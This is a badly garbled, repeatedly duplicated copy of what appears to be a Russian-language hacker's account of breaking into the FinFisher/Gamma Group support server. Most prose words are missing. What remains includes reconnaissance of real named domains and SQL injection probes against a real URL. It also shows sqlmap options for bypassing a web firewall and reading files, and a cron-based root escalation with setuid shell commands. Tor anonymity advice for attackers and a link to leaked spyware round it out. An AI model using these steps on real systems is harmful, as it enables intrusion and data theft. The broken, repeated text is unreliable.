. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
